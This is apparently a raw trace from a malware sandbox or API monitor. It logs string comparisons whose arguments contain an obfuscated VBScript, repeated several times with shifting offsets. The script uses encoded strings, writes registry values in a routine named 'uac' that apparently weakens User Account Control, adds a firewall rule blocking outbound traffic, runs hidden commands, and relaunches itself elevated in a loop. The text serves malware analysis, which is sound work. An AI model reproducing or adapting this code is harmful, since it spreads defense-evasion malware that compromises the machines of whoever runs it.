bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.030] wcsncmp (_String1="ule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.030] wcsncmp (_String1="le.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.030] wcsncmp (_String1="e.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.030] wcsncmp (_String1=".Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.030] wcsncmp (_String1="Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 